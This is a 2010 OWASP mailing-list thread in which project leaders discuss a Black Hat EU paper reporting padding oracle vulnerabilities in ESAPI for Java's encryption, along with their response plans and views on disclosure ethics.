[Esapi-user] [Owasp-leaders] Crypto attack and OWASP

Jeff Williams jeff.williams at owasp.org
Sun May 2 16:55:12 EDT 2010

IMHO this is just one more sign of a healthy security ecosystem. There will always be folks who think it's 37337 to release an unknown exploit regardless of the harm it causes. But complaining about it won't help.  No matter what, we need to have a measured response capability ready. It's entirely possible that this is an esoteric risk that doesn't really expose any real applications, however it could also be critical. At this point we don't know. I'm looking forward to evaluating the alleged flaw, whatever it might be.


-----Original Message-----
From: owasp-leaders-bounces at lists.owasp.org [mailto:owasp-leaders-bounces at lists.owasp.org] On Behalf Of Jim Manico
Sent: Sunday, May 02, 2010 1:30 PM
To: owasp-leaders at lists.owasp.org; ESAPI-Developers; ESAPI-Users
Subject: Re: [Owasp-leaders] Crypto attack and OWASP

We deprecated 1.4 encryption and are seeking bids for professional  
cryptographic-centric review of ESAPI 2.0 rc6 before we promote ESAPI  
to GA (general availability). I have stated on several occasions that  
no one should be using ESAPI for cryptographic storage in production  
apps - yet.

However, I do have issue with the irresponsible nature of this  

 >  We leave the finding of thes bugs as an exercise for readers

And I know that members of OWASP would NEVER pull a stunt like this to  
any vendor. Our ethics put community and open way above glory-seeking,  

Jim Manico

On May 2, 2010, at 1:50 AM, Christian Heinrich <christian.heinrich at owasp.org 
 > wrote:

> Nam,
> To quote https://media.blackhat.com/bh-eu-10/whitepapers/Duong_Rizzo/BlackHat-EU-2010-Duong-Rizzo-Padding-Oracle-wp.pdf
> "5.3.2 OWASP ESAPI
> OWASP ESAPI 20, which stands for OWASP Enterprise Security API
> Toolkits, is a project that claim to “help software developers guard
> against security-related design and implementation flaws.” However,  
> we
> found that all OWASP ESAPI for Java up to version 2.0 RC2 are
> vulnerable to Padding Oracle attacks 21. There were some significant
> changes in ESAPI Encryption API since 2.0 RC3 22. Unfortunately, while
> these changes are heading towards the correct direction, i.e. signing
> the ciphertex or using an authenticated encryption mode, but at the
> time of this writing, there are still some bugs in the latest
> implementation 23 that make applications using ESAPI for Java still
> vulnerable to Padding Oracle attacks. ."
> On Fri, Mar 5, 2010 at 12:15 PM, Nam Nguyen <namn at bluemoon.com.vn>  
> wrote:
>> Quote: We show that even OWASP folks can't get it right, how can an  
>> average Joe survive this new class of vulnerabilities?
>> http://www.blackhat.com/html/bh-eu-10/bh-eu-10-briefings.html#Duong
>> Anyone going to BH-EU?
> --
> Regards,
> Christian Heinrich - http://www.owasp.org/index.php/user:cmlh
> OWASP "Google Hacking" Project Lead - http://sn.im/ 
> owasp_google_hacking
> _______________________________________________
> OWASP-Leaders mailing list
> OWASP-Leaders at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-leaders
OWASP-Leaders mailing list
OWASP-Leaders at lists.owasp.org

More information about the Esapi-user mailing list